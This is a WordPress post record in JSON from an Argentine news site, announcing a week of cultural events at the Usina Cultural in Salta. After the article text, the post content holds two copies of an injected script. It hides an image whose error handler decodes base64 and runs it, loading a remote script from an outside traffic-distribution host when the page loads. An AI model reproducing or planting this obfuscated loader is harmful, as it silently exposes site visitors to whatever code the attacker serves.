{"id":4962,"date":"2025-03-20T21:47:56","date_gmt":"2025-03-21T00:47:56","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4962"},"modified":"2025-08-13T23:38:27","modified_gmt":"2025-08-14T02:38:27","slug":"arte-igualdad-y-bienestar-las-propuestas-culturales-en-la-usina-cultural","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4962","title":{"rendered":"Arte, igualdad y bienestar: las propuestas culturales en la Usina Cultural"},"content":{"rendered":"\n<p><strong><em>La agenda cultural de la semana ofrece una variedad de actividades que van desde el impulso a la autonom\u00eda econ\u00f3mica hasta espect\u00e1culos musicales y teatrales.<\/em><\/strong><\/p>\n\n\n\n<p>Hasta el 23 de marzo, la ciudad&nbsp;tendr\u00e1&nbsp;propuestas culturales y sociales que invitan a la reflexi\u00f3n, el disfrute y la participaci\u00f3n. El mi\u00e9rcoles 19 de marzo, el Teatro Usina Cultural ser\u00e1 el escenario de \u00abProgresar en Igualdad\u00bb, un programa dirigido a mujeres y personas LGBTIQ+ que buscan fortalecer su independencia econ\u00f3mica. A partir de las 10:00, los asistentes podr\u00e1n conocer las opciones de cr\u00e9ditos, microcr\u00e9ditos y banco de herramientas impulsadas por el Ministerio de Gobierno, Derechos Humanos y Trabajo a trav\u00e9s de la Secretar\u00eda de Mujeres, G\u00e9neros y Diversidad.<\/p>\n\n\n\n<p>Ma\u00f1ana s\u00e1bado 22 de marzo, de 15:30 a 20:30, en el Aula Taller, se llevar\u00e1 a cabo el encuentro \u00abCharlando sobre los \u00d3rdenes del Amor\u00bb, facilitado por Ariel Pavone y Andrea Yacuzzi. A trav\u00e9s de din\u00e1micas y ejercicios vivenciales, los participantes explorar\u00e1n la influencia de sus v\u00ednculos y aprender\u00e1n a liberar cargas emocionales heredadas. M\u00e1s tarde, a las 21:30, el SUM ser\u00e1 el espacio donde se presentar\u00e1 la obra \u00abMallevadas \u2013 Una historia argenta\u00bb, escrita por Florencia Aroldi y dirigida por Cristina Idiarte. Con un elenco s\u00f3lido y personajes llenos de matices, la puesta en escena promete una experiencia teatral intensa y bien trabajada.<\/p>\n\n\n\n<p>El cierre de la semana ser\u00e1 el domingo 23 de marzo a las 18:00 en el Anfiteatro con \u00abCamino a los diez a\u00f1os\u00bb, un espect\u00e1culo musical a cargo del grupo Inti Suma. Provenientes de Campo Quijano, la agrupaci\u00f3n interpretar\u00e1 m\u00fasica andina y contar\u00e1 con la participaci\u00f3n especial de artistas invitados como Florencia Causarano, la comparsa Los brujos del Enc\u00f3n, la agrupaci\u00f3n de tinkus Suyai Munay y los caporales Origen de mi tierra.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretaria de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La agenda cultural de la semana ofrece una variedad de actividades que van desde el impulso a la autonom\u00eda econ\u00f3mica hasta espect\u00e1culos musicales y teatrales. Hasta el 23 de marzo, la ciudad&nbsp;tendr\u00e1&nbsp;propuestas culturales y sociales que invitan a la reflexi\u00f3n, el disfrute y la participaci\u00f3n. El mi\u00e9rcoles 19 de marzo, el Teatro Usina Cultural ser\u00e1 [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4963,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,17],"tags":[],"class_list":{"0":"post-4962","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4962"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4962"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4962\/revisions"}],"predecessor-version":[{"id":6545,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4962\/revisions\/6545"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4963"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4962"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4962"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4962"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}